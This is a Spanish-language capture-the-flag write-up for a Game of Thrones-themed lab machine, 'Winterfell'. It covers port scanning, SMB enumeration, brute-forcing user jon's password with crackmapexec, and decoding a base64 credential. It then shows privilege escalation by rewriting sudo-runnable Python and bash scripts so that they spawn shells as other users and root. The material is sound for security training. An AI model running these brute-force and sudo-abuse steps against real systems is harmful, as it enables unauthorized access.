# Winterfell

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.17.0.2
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEhYrFMrsspAx4abCVuga%2Fimage.png?alt=media&#x26;token=ece3cdd3-3a35-4f81-a74d-d66d259ba148" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F6JU6HaxqHkKo5KgZHRNo%2Fimage.png?alt=media&#x26;token=d6e25162-ebd0-4625-af6a-e97f4c4b085c" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más. También tenemos un servicio **SMB**.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 172.17.0.2
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FhCguacPXVz5AaHqNy0Dh%2Fimage.png?alt=media&#x26;token=3189c772-9587-44bf-be1a-00bf82cb20c5" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web ambientada en la serie de Juego de Tronos.

Ahora buscaremos directorios y archivos con la herramienta **Gobuster** a través de:

```bash
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FJ2YlQzwG037Nyp8gXTIG%2Fimage.png?alt=media&#x26;token=74e0ddb8-1341-4f2c-b565-7c4dfc063452" alt=""><figcaption></figcaption></figure>

Descubrimos un directorio que nos llama la atención que es `/dragon`.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F4xK9Q2mCcdBAAeuL2k0e%2Fimage.png?alt=media&#x26;token=f5ffdbe0-c7f1-4523-8f79-b44312e64308" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F2ehiVk3V0UebqSsU0aiN%2Fimage.png?alt=media&#x26;token=5119ea19-e369-4051-a89c-afd4a6f1777f" alt=""><figcaption></figcaption></figure>

Vamos a indagar si tenemos acceso al servicio **SMB**.

```bash
smbclient -L 172.17.0.2
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FSTUz6gZHbImQmR1TLWHg%2Fimage.png?alt=media&#x26;token=7a24f827-4f5a-42a3-b618-b15718d3e775" alt=""><figcaption></figcaption></figure>

Vamos a descubrir usuarios válidos para **SMB**.

```bash
enum4linux 172.17.0.2
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FC2nlvdTgBVFMFUAcEHIC%2Fimage.png?alt=media&#x26;token=1183e2fe-0707-417f-b393-33a441b7cfb4" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Hemos descubierto un usuario **jon**. Teniendo en cuenta que la máquina trata de la serie posiblemente sea algún título una contraseña por lo que lo copiamos en un archivo y hacemos fuerza bruta.

```bash
crackmapexec smb 172.17.0.2 -u jon -p titulos.txt
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F5kEoqu9cuHBugz5HOSV7%2Fimage.png?alt=media&#x26;token=4f56bfc2-b9a6-4ad1-914d-7e25d3b9b5ef" alt=""><figcaption></figcaption></figure>

Con esas credenciales descubiertas nos conectamos a SMB.

```bash
smbclient \\\\172.17.0.2\\shared -U jon
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FvptroqbLqkVVlj1Dkfae%2Fimage.png?alt=media&#x26;token=04147e2c-a9cc-4f64-900a-453f4fd1e40c" alt=""><figcaption></figcaption></figure>

Mostramos el contenido del archivo.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FFaPYpjmIjdLpJcCjrHmq%2Fimage.png?alt=media&#x26;token=9fd35901-1d59-496f-8989-cdb163ad69c9" alt=""><figcaption></figcaption></figure>

Decodificamos la contraseña que está en **base64**.

```bash
echo "aGlqb2RlbGFuaXN0ZXI=" | base64 -d
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FrEAmugspQQ9YtLdjZ6DJ%2Fimage.png?alt=media&#x26;token=c9607b7f-b9d6-45ed-a551-6883912adb88" alt=""><figcaption></figcaption></figure>

Nos conectamos con esas credenciales al usuario **jon**.

```bash
ssh jon@172.17.0.2
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FfiboBKBt06Fpxsv58gtG%2Fimage.png?alt=media&#x26;token=5076a3f9-e4f0-4263-88f9-d73183e14099" alt=""><figcaption></figcaption></figure>

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FGSYFzEGj90lMjskIW18z%2Fimage.png?alt=media&#x26;token=6de99226-c454-4f40-a780-95018bed371d" alt=""><figcaption></figcaption></figure>

Lo que hacemos es borrar el archivo y crear lo mismo pero con un contenido para tener una shell.

```bash
rm .mensaje.py
nano /home/jon/.mensaje.py
```

```bash
import os
os.system('/bin/bash')
```

```bash
sudo -u aria /usr/bin/python3 /home/jon/.mensaje.py
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FyA7DivZO90LkPkhdLJhy%2Fimage.png?alt=media&#x26;token=84d937e3-e7e7-4b39-b253-915f7176a0c1" alt=""><figcaption></figcaption></figure>

Los binarios que tenemos a nuestra disposición nos permiten leer y listar archivos que pertenecen a Daenerys. Por lo tanto, podemos suponer que uno de los pasos a seguir es explorar algún archivo en su directorio home. Primero, listamos el contenido del directorio y encontramos un archivo llamado `mensajeParajon`, que podría ser relevante para nuestras acciones.

```bash
sudo -u daenerys ls /home/daenerys
sudo -u daenerys cat /home/daenerys/mensajeParaJon
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FiIpaYyppu5WCb0LKaAgS%2Fimage.png?alt=media&#x26;token=091aad58-4502-494c-ab45-dfdf4eb8d6d7" alt=""><figcaption></figcaption></figure>

Nos logueamos con **daenerys** con la contraseña descubierta.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F1iSufdTBfmc37fVhKRcQ%2Fimage.png?alt=media&#x26;token=1e585f93-c544-4551-8eac-2be2577b6382" alt=""><figcaption></figcaption></figure>

Lo primero que hacemos es leer el archivo y descubrimos que es un script en bash que establece una conexión con otra dirección IP. Sin embargo, al revisar los permisos, notamos que tenemos acceso a él. Por lo tanto, para escalar privilegios, solo necesitamos editar el archivo.

```bash
#!/bin/bash
bash
```

Ejecutamos.

```bash
sudo /usr/bin/bash /home/daenerys/.secret/.shell.sh
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FtxZUHo1FWA1itJ3xK6qm%2Fimage.png?alt=media&#x26;token=d3db223e-59d6-412f-ad82-d7f908941511" alt=""><figcaption></figcaption></figure>
